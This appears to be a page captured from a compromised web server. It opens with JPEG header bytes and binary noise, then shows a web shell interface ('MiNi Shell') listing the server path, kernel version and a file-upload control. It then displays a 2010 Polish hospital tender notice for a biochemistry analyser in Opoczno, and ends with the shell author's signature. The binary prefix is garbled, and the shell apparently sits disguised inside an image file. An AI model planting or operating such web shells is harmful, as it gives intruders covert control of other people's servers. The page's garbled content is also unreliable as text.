JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/10793-N-2010.html

<p class="kh_header"><b>Opoczno: Przetarg nieograniczony na dostawę odczynników, kalibratorów, materiałów kontrolnych i materiałów zużywalnych wraz z dzierżawą analizatora biochemicznego dla  potrzeb SP ZOZ Szpitala Powiatowego im.  Edmunda Biernackiego w Opocznie</b><br>
<b>Numer ogłoszenia: 10793 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ Szpital Rejonowy w Opocznie , ul. Partyzantów 30, 26-300 Opoczno, woj. łódzkie, tel. 044 7544823.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.opoczno.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę odczynników, kalibratorów, materiałów kontrolnych i materiałów zużywalnych wraz z dzierżawą analizatora biochemicznego dla  potrzeb SP ZOZ Szpitala Powiatowego im.  Edmunda Biernackiego w Opocznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników, kalibratorów, materiałów kontrolnych i materiałów zużywalnych wraz z dzierżawą automatycznego analizatora biochemicznego. dla potrzeb SP ZOZ Szpitala Powiatowego im. Edmunda Biernackiego w Opocznie. 

 Określenie przedmiotu zamówienia

Wymaga się, aby analizator biochemiczny spełniał następujące parametry graniczne:
1.  Automatyczny wieloparametrowy analizator biochemiczny o wydajności nie 
     mniejszej niż 300 oznaczeń kolorymetrycznych na godzinę. (podać typ oferowanego 
     analizatora, rok produkcji, załączyć folder opisujący proponowany aparat).
2.  Wymiary analizatora umożliwiające jego instalacje w laboratorium bez żadnych prac
      budowlanych (max. 80 cm wysokość do 180 cm) uwarunkowane drogą 
      komunikacyjną- szerokość drzwi - 80 cm)
3.  Wbudowany moduł ISE o wydajności nie mniejszej niż 180 oznaczeń na godzinę (Na,
     K, Cl ) zaopatrzony w elektrody jonoselektywne
4.  Całkowicie otwarty system odczynnikowy analizatora.
5.  System chłodzenia odczynników, kontroli, kalibratorów i próbek pacjentów
     znajdujących się w aparacie.
6.  Szybkość analizatora- oczekiwanie na wynik nie dłuższe niż 10 minut
7  Kuwety pomiarowe jednorazowe
8.  Możliwości analityczne analizatora:
a.substraty,
b.enzymy,
c.białka specyficzne,
d.monitorowanie leków.
 9.  Możliwość wykonania poniższych testów:
- Alkaliczna fosfataza
- Amylaza
- Bilirubina
- Cholesterol
- Kreatynina
- Mocznik
- Kwas moczowy
- Triglicerydy
- GGTP
- ALAT
- ASPAT
- Glukoza
- HDL
- Białko całkowite
- Sód
- Potas
- Chlorki
- Wapń
- Magnez
- Fosfor
- Żelazo
- Kinaza kreatynowa
- CK-MB
- CRP
- ASO
- Orozomukoid
- Czynnik reumatoidalny 
- Hemoglobina glikowana
- Alkohol etylowy

10. Minimum 35 pozycji odczynnikowych oraz 60 pozycji na próbki pacjentów.
11. Możliwość wykonywania badań cito bez przerywania ciągłości pracy rutynowej.
12. Minimum 5 miejsc na próbki cito.
13. Możliwość ciągłego uzupełniania odczynników bez przerywania pracy aparatu.
14. Możliwość automatycznego rozcieńczania próbek badanych -wstępnego i dodatkowego 
      po przekroczeniu liniowości testu.
15. Zapewnienie bezpłatnych usług serwisowych na okres trwania umowy na aparat 
      biochemiczny.
16. Detektor poziomu próbki i odczynnika.
17. Program kontroli jakości spełniający poniższe kryteria:
- system jakości badań z możliwością zastosowania analizy Levey- Jenningsa, reguł
Westgarda,
- wyliczanie średniej, odchylenia standardowego, współczynnika zmienności,
- graficzne prezentowanie wyników kontroli jakości.

18.  Dwukierunkowa transmisja danych.
19.  Należy dostarczyć autoryzowane aplikacje do odczynników na oferowany aparat.
20.  Możliwość zastosowania probówek pierwotnych i kubków pediatrycznych.
21.  Możliwość kalibracji bez przerywania rutynowej pracy aparatu.
22.  Możliwość pracy z różnymi rodzajami materiału biologicznego (surowica, osocze, mocz, 
       płyn mózgowo-rdzeniowy, hemoliza krwi pełnej-HbA1c).
23.  Swobodny dostęp do odczynników (wstawianie i wystawianie) w każdej fazie pracy 
       aparatu bez konieczności jego zatrzymywania.
24.  Analizator wolnostojący z wydzielonym stanowiskiem komputerowym umożliwiającym 
       programowanie w pozycji siedzącej.
25.  Możliwość podłączenia analizatora w sieć laboratoryjną.

W przypadku awarii aparatu niezbędny przyjazd serwisu w czasie 48 godz. od chwili zgłoszenia.
Oferent zabezpieczy warunki pracy analizatora wynikające z instrukcji użytkowania (wilgotność, temperatura) poprzez dostarczenie zewnętrznego klimatyzatora.
Wymiary pomieszczenia , w którym będzie pracował analizator biochemiczny wynoszą:
długość pracowni - 5m
szerokość pracowni - 4,5m
wysokość pracowni - 3,2m

Oferent zobowiązany jest na czas trwania umowy dostarczyć zestaw komputerowy i we własnym zakresie dokonać podłączenia analizatora do sieci komputerowej laboratorium
(w laboratorium używany jest Laboratoryjny System Informatyczny DIAGNOSTYKA SOFTWARE).

Wymagania dotyczące  zestawu komputerowego

Płyta główna: Microstar K9MM-V
Procesor: AMD Athlon 64 X2 4000 + BOX 1Mb-2 1Ghz-S-AM2 (65W)
Pamięci RAM: Kingston DDR2 512MB 533MHZ
Napęd optyczny: DVD
Obudowa: Typu Tower- zasilacz 400W
Stacja dyskietek: FDD 1.44 MB 3.5´
Monitor: Monitor LCD 17 SAMSUNG SM 740N
Dysk twardy: WD Carviar SE 80 GB 8 MB cache Serial ATA
Drukarka: HPLJ p2015
System operacyjny: Microsoft Windows XP professional PL OEM

Ocenie technicznej podlegać będą wartości:
1.Ilość wody zużytej w ciągu godziny
   Zużycie wody nie większe niż 2,5l-h                           - tak  20 pkt
                                                                                         -  nie    0 pkt
2.Żywotność elektrod
   Żywotność elektrod nie krótsza niż 6 miesięcy            - tak  30pkt
                                                                                         - nie    0 pkt

3.Oprogramowanie w języku polskim                             - tak  30 pkt
                                                                                         - nie    0 pkt

4.Krótki czas wykonania przez użytkownika                  - tak   20 pkt
   codziennej procedury konserwacyjnej                         - nie     0 pkt
   nie dłuższy niż 10 minut                     
   (opisać wymagane czynności).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki dotyczące:
a)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
b)posiadania wiedzy i doświadczenia,
c)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
d)sytuacji ekonomicznej i finansowej ,
      e)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24  ustawy Prawo zamówień publicznych 
f) wyrażają zgodę na wszystkie warunki i wymogi określone w SIWZ.

W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  Prawo zamówień publicznych zamawiający żąda następujących dokumentów:
 Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert
Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne oraz społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie  wcześniej niż 3 miesiące przed upływem terminu składania ofert.
	W celu potwierdzenia, że oferowany przedmiot umowy odpowiada wymaganiom określonym w SIWZ Zamawiający żąda:
 Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1-4 ustawy Pzp wg wzoru stanowiącego załącznik nr 2 do SIWZ
 Formularz asortymentowo-cenowy
 Znak jakości CE, odnoszący się do sprzętu i odczynników.
 Oświadczenie wykonawcy, że przedmiot zamówienia posiada wymagane prawem dokumenty dopuszczające do obrotu w publicznych zakładach opieki zdrowotnej i że udostępni stosowne dokumenty na każde wezwania Zamawiającego
 Karty charakterystyki produktu i substancji niebezpiecznych ( może być na płycie CD).
 Wypełniony formularz ofertowy zał 1.	
	Do ofert należy również dołączyć 
 Parafowany wzór umowy.
 Dokumenty  o których jest mowa powyżej mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
  Złożenie oferty jest równoznaczne z akceptacją warunków zawartych w SIWZ.
    Brak jakichkolwiek z wyżej wymienionych oświadczeń i dokumentów lub złożenie  
     dokumentów w niewłaściwej formie i niewłaściwym czasie spowoduje odrzucenie oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert
2. Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne oraz społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie  wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1-4 ustawy Pzp wg wzoru stanowiącego załącznik nr 2 do SIWZ
4. Formularz asortymentowo-cenowy
5.Znak jakości CE, odnoszący się do sprzętu i odczynników.
6. Oświadczenie wykonawcy, że przedmiot zamówienia posiada wymagane prawem dokumenty dopuszczające do obrotu w publicznych zakładach opieki zdrowotnej i że udostępni stosowne dokumenty na każde wezwania Zamawiającego
7. Karty charakterystyki produktu i substancji niebezpiecznych ( może być na płycie CD).
8. Wypełniony formularz ofertowy zał 1.	
	Do ofert należy również dołączyć 
9.Parafowany wzór umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - ocena techniczna ( jakość ) - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.opoczno.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Szpital Powiatowy im. Edmunda Biernackiego w Opocznie , 26-300 Opoczno, ul. Partyzantów  30, Sekretariat,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2010 godzina 12:00, miejsce: SP ZOZ Szpital Powiatowy im. Edmunda Biernackiego w Opocznie , 26-300 Opoczno, ul. Partyzantów  30, Sekretariat, nie później niż do dnia   27.01.2010r., do godz. 12.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com